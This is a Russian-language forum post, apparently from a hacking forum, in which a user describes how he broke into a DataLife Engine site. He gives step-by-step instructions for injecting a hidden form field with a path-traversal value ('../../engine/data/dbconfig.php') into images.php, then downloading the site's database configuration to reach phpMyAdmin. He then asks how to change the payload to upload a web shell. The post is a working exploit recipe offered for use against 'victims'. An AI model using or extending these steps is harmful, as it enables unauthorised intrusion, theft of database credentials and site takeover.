kokatub
Сообщений: 6
Оценки: 0
Присоединился: 2008-11-30 14:01:42.820000
|
Нужна помощь. Взломал дле по такой системе : 1. Заходим на сайт жертвы
2. Регистрируемся и авторизуемся
3. Переходим по ссылке http://адрес_сайта.ru/engine/images.php (где адрес_сайта.ru – адрес жертвы)
4. Открываем исходный код открытой нами страницы и после строки(она может немного отличаться и повторяться 2 раза, вставляем после 1-ой)
<input type="hidden" name="area" value=''/>
вставляем
<input type="hidden" name="serverfile" value='../../engine/data/dbconfig.php'/>
Нажимаем в браузере, под вкладками – Применить изменения
5. После этих действий необходимо проверить работоспособность дырки, для этого на странице http://адрес_сайта.ru/engine/images.php, нажимаем – Загрузить. В списке загруженных файлов должен появиться dbconfig.php, в нем находится информация которая поможет попасть к БД сайта(phpMyAdmin), которая находится чаще всего по адресу - адрес_сайта.ru/myadmin/ или адрес_сайта.ru/phpmyadmin/
Для скачивания файла конфигурации мы должны навести на него указатель мыши и посмотреть ID, затем через Исходный код страницы / Применить изменения мы вставляем в любое место страницы сайта жертвы ссылку вида:
<a href="http://адрес_сайта.ru/engine/download.php?id=ID_файла">[download]</a> А как можна написать вместо этого <input type="hidden" name="serverfile" value='../../engine/data/dbconfig.php'/> что бы залить шелл?
|